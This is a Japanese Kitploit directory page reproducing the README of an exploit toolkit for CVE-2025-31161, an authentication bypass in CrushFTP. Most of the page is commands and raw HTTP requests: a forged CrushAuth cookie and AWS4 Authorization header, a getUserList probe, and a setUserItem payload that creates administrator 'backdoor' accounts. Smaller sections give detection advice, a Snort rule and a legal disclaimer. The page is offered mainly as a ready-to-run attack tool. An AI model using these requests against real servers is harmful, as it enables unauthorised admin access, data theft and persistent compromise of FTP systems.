Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CrushFTP-auth-bypass-CVE-2025-31161 — 多言語エクスプロイトツールキット for CVE-2025-31161(CrushFTPの認証バイパス)。許可されたセキュリティテストやCTFチャレンジ向けに、脆弱性検出、ユーザー列挙、不正な管理者アカウント作成を可能にします。 | Kitploit
ツール/GitHubGitHub/0xdtc/crushftp-auth-bypass-cve-2025-31161
認証と認可ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテストコマンド&コントロール学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
レッドチーミング
GitHub0xdtc/crushftp-auth-bypass-cve-2025-31161

CrushFTP-auth-bypass-CVE-2025-31161

多言語エクスプロイトツールキット for CVE-2025-31161(CrushFTPの認証バイパス)。許可されたセキュリティテストやCTFチャレンジ向けに、脆弱性検出、ユーザー列挙、不正な管理者アカウント作成を可能にします。

リポジトリを見る
10ヶ月前未レビュー

CrushFTP 認証バイパス - CVE-2025-31161

License: MIT CVE Go Bash

CVE-2025-31161(CrushFTPの認証バイパスの脆弱性)を悪用するための包括的なツールキットです。この脆弱性により、権限のないユーザーアカウントの作成が可能になります。

🔍 CVE-2025-31161 とは?

CVE-2025-31161 は CrushFTP における重大な認証バイパスの脆弱性であり、攻撃者は適切な認証なしに不正なユーザーアカウントを作成できます。この脆弱性は Web インターフェースのユーザー管理機能に存在します。

技術詳細

  • CVSS スコア: 未定
  • 影響を受けるソフトウェア: CrushFTP Web インターフェース
  • 攻撃ベクトル: ネットワーク
  • 必要な認証: なし
  • 影響: 不正なアカウント作成によるシステム全体の侵害

🚀 機能

  • マルチ言語対応: Go および Bash による実装
  • スマートな脆弱性検出: 悪用前にターゲットが脆弱かどうかを自動確認
  • ユーザー列挙: 脆弱なターゲット上の既存ユーザーを一覧表示
  • ユーザー作成: 新しい管理アカウントを作成
  • 対話モード: ターゲットが脆弱であると確認された場合のみ認証情報を要求
  • 短縮フラグ: -t、-p、-tu フラグで素早くアクセス
  • カスタムポート対応: さまざまなデプロイシナリオに対応するポート設定可能
  • 教育重視: CTF チャレンジやセキュリティ研究向けに設計

📁 リポジトリ構造

root@kitploit:~
CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md                 # このドキュメント
├── cve-2025-31161.go        # Go 実装(推奨)
├── cve-2025-31161.sh        # Bash 実装
└── LICENSE                  # MIT ライセンス

🛠️ インストールと要件

前提条件

Go 版(推奨)

root@kitploit:~
# Go のインストール(未インストールの場合)
sudo apt install golang-go
# または
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

Bash 版

root@kitploit:~
# curl が必要(通常はプリインストール)
sudo apt install curl

クイックセットアップ

root@kitploit:~
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh

🎯 使用方法

Go 版(推奨)

ユーザー一覧表示

root@kitploit:~
# 短縮フラグを使用した基本
go run cve-2025-31161.go -t example.com -lu

# カスタムポートで
go run cve-2025-31161.go -t example.com -p 8080 -lu

# 長形式フラグ
go run cve-2025-31161.go --target_host example.com --port 8080 -lu

新規ユーザー追加

root@kitploit:~
# 新規ユーザー作成(ユーザー名/パスワードの入力を促されます)
go run cve-2025-31161.go -t example.com -au

# カスタムターゲットユーザーで(デフォルト: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au

# 長形式フラグ
go run cve-2025-31161.go --target_host example.com --target_user admin -au

Bash 版

ユーザー一覧表示

root@kitploit:~
# 基本
./cve-2025-31161.sh -t example.com -lu

# カスタムポートで
./cve-2025-31161.sh -t example.com -p 8080 -lu

新規ユーザー追加

root@kitploit:~
# 新規ユーザー作成
./cve-2025-31161.sh -t example.com -au

# カスタム設定で
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au

利用可能なフラグ

使用例

root@kitploit:~
# 例1: ターゲット上のユーザー列挙
go run cve-2025-31161.go -t ftp.example.htb -lu

# 例2: バックドアアカウントの作成
go run cve-2025-31161.go -t ftp.example.htb -au
# その後入力: username: backdoor, password: P@ssw0rd123

# 例3: 非標準ポートでユーザー列挙
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu

# ヘルプ表示
./cve-2025-31161.sh --help

🔄 動作の仕組み

root@kitploit:~
flowchart TD
    A[Start Exploit] --> B[Check Target Connectivity]
    B --> C{Target Reachable?}
    C -->|No| D[Exit: Connection Failed]
    C -->|Yes| E[Send getUserList Request]
    E --> F{Response Contains OK?}
    F -->|No| G[Exit: Not Vulnerable]
    F -->|Yes| H[Target is Vulnerable!]
    H --> I{Mode Selected?}
    I -->|List Users -lu| J[Parse XML Response]
    J --> K[Display User List]
    K --> L[Exit: Success]
    I -->|Add User -au| M[Prompt for Username]
    M --> N[Prompt for Password]
    N --> O[Send Warm-up Request]
    O --> P[Craft User Creation Payload]
    P --> Q[Send setUserItem Request]
    Q --> R{User Created Successfully?}
    R -->|Yes| S[Success: Account Created]
    R -->|No| T[Failed: Exploitation Failed]

    style A fill:#e1f5fe
    style H fill:#c8e6c9
    style K fill:#81c784
    style S fill:#4caf50
    style D fill:#ffcdd2
    style G fill:#ffcdd2
    style T fill:#ffcdd2

🧪 エクスプロイトの流れの説明

ステップ1: 脆弱性検出

スクリプトはまず getUserList リクエストを送信し、ターゲットが脆弱かどうかを確認します。

root@kitploit:~
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

レスポンスに <response_status>OK</response_status> が含まれている場合、ターゲットは脆弱です。

ステップ2a: ユーザー列挙(ユーザー一覧モード)

-lu フラグを使用すると、スクリプトは XML レスポンスを解析してユーザー名を抽出します。

root@kitploit:~
<user_list type="vector">
    <user_list_subitem>ben</user_list_subitem>
    <user_list_subitem>crushadmin</user_list_subitem>
    <user_list_subitem>default</user_list_subitem>
</user_list>

出力:

root@kitploit:~
[+] Users:
  - ben
  - crushadmin
  - default

ステップ2b: ユーザーアカウント作成(ユーザー追加モード)

-au フラグを使用すると、スクリプトは悪意のある XML ペイロードを含む setUserItem リクエストを送信します。

root@kitploit:~
POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded

command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If

ステップ3: 検証

スクリプトはレスポンス内の <response_status>OK</response_status> を確認し、ユーザー作成が成功したことを確認します。


⚠️ 脆弱性の詳細

根本原因

この脆弱性は、CrushFTP Web インターフェースのユーザー管理機能における認証チェックの不十分さに起因します。アプリケーションは、要求元の権限を適切に検証せずにユーザー作成リクエストを受け入れます。

影響評価

  • 機密性: 高 - ファイルシステムへの不正アクセス
  • 整合性: 高 - ファイルの変更/アップロードが可能
  • 可用性: 中 - リソース枯渇の可能性

攻撃シナリオ

  1. 初期アクセス: 持続的なアクセスのためのバックドアアカウントを作成
  2. 権限昇格: 管理者レベルのアカウントを作成
  3. データ窃取: FTP インターフェースを介して機密ファイルにアクセス
  4. 水平移動: 侵害された FTP サーバーを足がかりとして使用

🛡️ 検出と緩和策

検出方法

  • Web ログでの不審な setUserItem リクエストを監視
  • 通常のプロセス外で作成された新しいユーザーアカウントを確認
  • 認証バイパスパターンに対する異常検知を実装

緩和戦略

  1. 即時: /webinterface/function/ エンドポイントへのアクセスをブロック
  2. 短期: パッチ適用済みの CrushFTP バージョンにアップデート
  3. 長期: 適切な認証制御を実装

ネットワークシグネチャ

root@kitploit:~
# Snort/Suricata ルール例
alert http any any -> any any (msg:"CrushFTP CVE-2025-31161 Exploit Attempt"; flow:established,to_server; content:"setUserItem"; http_uri; content:"serverGroup=MainUsers"; http_client_body; sid:1000001; rev:1;)

🎓 教育用途

CTF シナリオ

  • Web アプリケーションセキュリティ: 認証バイパスの脆弱性を理解する
  • ペネトレーションテスト: 実際の悪用手法を実演する
  • レッドチーム演習: APT スタイルの攻撃をシミュレートする

学習目標

  • HTTP リクエストの操作を理解する
  • XML インジェクションの手法
  • 認証バイパスの方法論
  • マルチ言語によるエクスプロイト開発

🚨 法的免責事項

⚠️ 重要: このツールは以下の目的のために設計されています。

  • 教育目的
  • 許可されたペネトレーションテスト
  • CTF 競技
  • 管理された環境でのセキュリティ研究

明示的な書面による許可なしにシステムで使用しないでください。コンピュータシステムへの不正アクセスは違法であり、重大な法的結果を招く可能性があります。

🤝 コントリビューション

コントリビューションを歓迎します。以下の手順に従ってください。

  1. リポジトリをフォーク
  2. フィーチャーブランチを作成 (git checkout -b feature/improvement)
  3. 変更をコミット (git commit -am 'Add new feature')
  4. ブランチにプッシュ (git push origin feature/improvement)
  5. プルリクエストを作成

開発ガイドライン

  • 既存のコードスタイルに従う
  • 詳細なコメントを追加する
  • 複数のターゲット環境でテストする
  • 新機能のドキュメントを更新する

📝 バージョン履歴

バージョン日付変更内容
1.0.02025-01-XXGo と Bash の実装を含む初回リリース
1.1.02025-01-XX対話モードと脆弱性検出を追加
1.2.02025-10-02ユーザー列挙 (-lu)、個別のユーザー追加モード (-au)、短縮フラグ (-t, -p, -tu) を追加

📚 参考資料

  • CVE-2025-31161 詳細
  • CrushFTP 公式サイト
  • OWASP 認証バイパス
  • Immersive Labs によるオリジナル研究

📧 お問い合わせ

質問、提案、セキュリティ上の懸念がある場合は、このリポジトリでイシューを開いてください。

ツールをダウンロード
フラグ長形式説明デフォルト
-t--target_hostターゲットのホスト名またはIP(必須)-
-p--portターゲットのポート80
-tu--target_user悪用に使用するターゲットユーザーcrushadmin
-lu--list-users既存ユーザーの一覧表示-
-au--add-user新規ユーザー追加(対話式)-
--helpヘルプメッセージを表示-